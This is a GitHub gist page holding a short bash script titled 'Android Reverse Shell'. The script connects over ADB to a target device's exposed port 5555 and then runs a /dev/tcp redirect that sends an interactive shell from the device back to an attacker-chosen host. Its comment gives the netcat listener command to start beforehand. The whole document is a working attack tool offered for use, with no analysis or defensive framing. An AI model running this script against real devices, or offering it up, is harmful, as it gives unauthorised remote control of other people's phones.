Created
July 4, 2022 19:02
-
-
Save CalfCrusher/6b1f4c0485e7f096bcff8454817bd2f8 to your computer and use it in GitHub Desktop.
Android Reverse Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Simple reverse shell on android devie using Android Debug Bridge ensure you run nc -lvp 4444 on another screen first. | |
# By Random_Robbie | |
adb connect $1:5555 | |
adb shell sh -i >& /dev/tcp/$2/4444 0>&1 | |
echo "[*] Should have a shell now ..... Be nice :) [*]" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment